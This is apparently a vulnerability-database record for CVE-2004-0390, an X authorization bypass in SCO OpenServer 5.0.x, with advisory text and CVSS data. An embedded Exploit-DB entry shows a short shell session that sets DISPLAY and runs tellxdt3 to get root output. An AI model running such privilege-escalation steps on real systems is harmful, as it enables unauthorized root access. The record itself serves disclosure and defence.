ID OSVDB:6078 Type osvdb Reporter Kevin Finisterre(kf@digitalmunition.com) Modified 2004-04-07T04:12:07
Description
Vulnerability Description
OpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.
Solution Description
Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.
Short Description
OpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.
{"type": "osvdb", "published": "2004-04-07T04:12:07", "href": "https://vulners.com/osvdb/OSVDB:6078", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 0, "edition": 1, "reporter": "Kevin Finisterre(kf@digitalmunition.com)", "title": "SCO OpenServer X Display Xauthority Bypass", "affectedSoftware": [{"operator": "eq", "version": "5.0.7", "name": "OpenServer"}, {"operator": "eq", "version": "5.0.6", "name": "OpenServer"}, {"operator": "eq", "version": "5.0.5", "name": "OpenServer"}], "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0390"]}, {"type": "exploitdb", "idList": ["EDB-ID:20851"]}], "modified": "2017-04-28T13:20:00", "rev": 2}, "vulnersScore": 6.1}, "references": [], "id": "OSVDB:6078", "lastseen": "2017-04-28T13:20:00", "cvelist": ["CVE-2004-0390"], "modified": "2004-04-07T04:12:07", "description": "## Vulnerability Description\nOpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.\n## Short Description\nOpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.\n## References:\n[Secunia Advisory ID:11586](https://secuniaresearch.flexerasoftware.com/advisories/11586/)\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt\n[CVE-2004-0390](https://vulners.com/cve/CVE-2004-0390)\n"}
{"cve": [{"lastseen": "2021-02-02T05:22:58", "description": "SCO OpenServer 5.0.5 through 5.0.7 only supports Xauthority style access control when users log in using scologin, which allows remote attackers to gain unauthorized access to an X session via other X login methods.", "edition": 4, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-0390", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0390"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/o:sco:openserver:5.0.7", "cpe:/o:sco:openserver:5.0.6", "cpe:/o:sco:openserver:5.0.5"], "id": "CVE-2004-0390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sco:openserver:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:sco:openserver:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:sco:openserver:5.0.6:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T15:08:39", "description": "SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability. CVE-2004-0390. Local exploit for sco platform", "published": "2001-05-07T00:00:00", "type": "exploitdb", "title": "SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0390"], "modified": "2001-05-07T00:00:00", "id": "EDB-ID:20851", "href": "https://www.exploit-db.com/exploits/20851/", "sourceData": "source: http://www.securityfocus.com/bid/2731/info\r\n\r\nOpenServer is a Unix based operating system distributed by Santa Cruz Operations.\r\n\r\nA problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.\r\n\r\nThis problem makes it possible for a local user to execute commands as root. \r\n\r\n$ pwd\r\n/usr/lib/X11/IXI/XDesktop/bin/i3sc0322\r\n$ DISPLAY=localhost:0\r\n$ export DISPLAY\r\n$ id\r\nuid=232(kevin) gid=101(supp) groups=101(supp),50(group)\r\n$ ./tellxdt3 /usr/bin/id\r\n*** Can't open message catalogue XDesktop3\r\nuid=0(root) gid=3(sys) groups=3(sys),1(other) ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20851/"}]}
